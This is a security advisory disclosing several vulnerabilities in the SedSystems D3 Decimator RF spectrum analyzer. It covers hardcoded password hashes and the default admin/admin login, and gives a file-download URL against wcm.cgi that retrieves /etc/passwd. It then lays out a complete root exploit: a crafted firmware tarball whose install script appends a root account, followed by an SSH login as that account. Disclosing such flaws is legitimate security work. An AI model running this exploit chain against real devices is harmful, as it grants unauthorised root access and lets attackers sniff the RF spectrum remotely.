SedSystems D3 Decimator Multiple Vulnerabilities
================================================
Identification of the vulnerable device can be performed by scanning for
TCP port 9784 which offers a default remote API. When connected to this
device it will announce itself with "connected" or similar:
Connected to x.x.x.x.
Escape character is '^]'.
connected
status
status:3.1,3.0.12-1,0,0,41.0,Valid,Valid,540,-1.0,-1.0,5.1,11.4,-1.0
ping
ping:ok
The web service by default has a user interface for accessing the RF
spectrum analyzer capability. The device itself from the API can give
raw remote access to I/Q samples so can be used to remotely sniff the
RF spectrum. The Web Configuration Manager can be found on
"/cgi-bin/wcm.cgi". Multiple vulnerabilities exist.
Hardcoded credentials can be found in the /etc/passwd files contained
within the default firmware since at least February 2013. The following
entries can be found:
root:$1$zfy/fmyt$khz2yIyTFDoCkhxWw7eX8.:0:0:root:/:/bin/sh
admin:$1$$CoERg7ynjYLsj2j4glJ34.:1000:0:root:/:/bin/webonly
The admin user has a default password of "admin", at this time the root
user password is unknown however there is no documented way of changing
this trivially in a device. Using the "admin" user you can obtain a web
session to the wcm.cgi and exploit a hidden arbitary file download
vulnerability discovered by reverse engineering the firmware:
http://x.x.x.x/cgi-bin/wcm.cgi?sessionid=009d45ecbabe015babe3300f&download=true&fullfilename=/etc/passwd
This will allow you to download any file and as the "admin" user has root
privileges you can obtain access to any file on the device. To execute
arbitary code you can make use of a vulnerbaility within the firmware
flash routines. By uploading a crafted tarball that contains a "install"
script in its root, the device will accept your firmware and then attempt
to execute ./install if found as root, you can then cancel the "flash"
process to prevent bricking/modifcation of the device. The problem is due
to /usr/bin/install_flash which after using "tar" to unpack an archive
to a tmp folder of /tmp/PID_of_tar does the following:
80 # If the archive contained its own install script then use that
81
82 if [ -x ./install ]; then
83 ./install $all_args
84 rc=$?
85 exit $rc
86 fi
87
Using this vulnerability you can upload a .tar file containing an install
file that looks like the following to obtain a root user account with
adm1n/admin.
cat install
#!/bin/sh
echo adm1n:\$1\$\$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh >> /etc/passwd
You can then SSH remotely to the device as PermitRootLogin is enabled
by default.
E.g.
$ ssh -l adm1n x.x.x.x
adm1n@x.x.x.x's password: admin
# uname -a
Linux d3-decimator-540 2.6.34.10 #1 PREEMPT Wed Aug 8 10:04:25 CST 2012 armv5tejl GNU/Linux
# cat /proc/cpuinfo
Processor : ARM926EJ-S rev 4 (v5l)
BogoMIPS : 103.83
Features : swp half thumb fastmult vfp edsp java
CPU implementer : 0x41
CPU architecture: 5TEJ
CPU variant : 0x0
CPU part : 0x926
CPU revision : 4
Hardware : SED 32XX Based CCA
Revision : 0000
Serial : 0000000000000000
#
Vendor website can be found at the following url:
* http://www.sedsystems.ca/decimator_spectrum_analyzer
-- prdelka